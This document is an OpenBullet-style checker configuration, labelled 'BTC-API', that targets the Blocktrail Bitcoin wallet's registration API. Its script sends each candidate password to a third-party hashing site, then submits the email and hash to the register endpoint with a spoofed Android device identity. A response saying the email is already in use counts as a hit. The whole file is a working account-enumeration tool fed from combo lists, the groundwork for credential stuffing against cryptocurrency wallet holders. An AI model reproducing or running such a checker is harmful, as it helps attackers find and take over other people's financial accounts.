[SETTINGS]
{
  "Name": "BTC-API",
  "SuggestedBots": 1,
  "LastModified": "2019-03-16T02:25:15.475985+01:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.cleancss.com/api.php" AutoRedirect=TRUE 
  CONTENT "function=sha512-hash-generator&string=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
PARSE "<SOURCE>" LR "{\"string\":\"" "\"" Recursive=FALSE -> VAR "PASS1" "" "" 
REQUEST POST "https://api.blocktrail.com/v1/BTC/mywallet/register" AutoRedirect=TRUE 
  CONTENT "{\"username\":null,\"email\":\"<USER>\",\"password\":\"<PASS1>\",\"password_score\":3,\"platform\":\"Android\",\"version\":\"4.4.4\",\"device_uuid\":\"74d4352031746594\",\"device_name\":\"Android / SM-G955N\",\"super_secret\":null,\"powtcha\":null,\"browser_fingerprint\":null,\"skip_two_factor\":true}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G955N Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: com.blocktrail.mywallet" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "api_secret" 
  KEYCHAIN Success OR 
    KEY "This email address or username is already in use" 
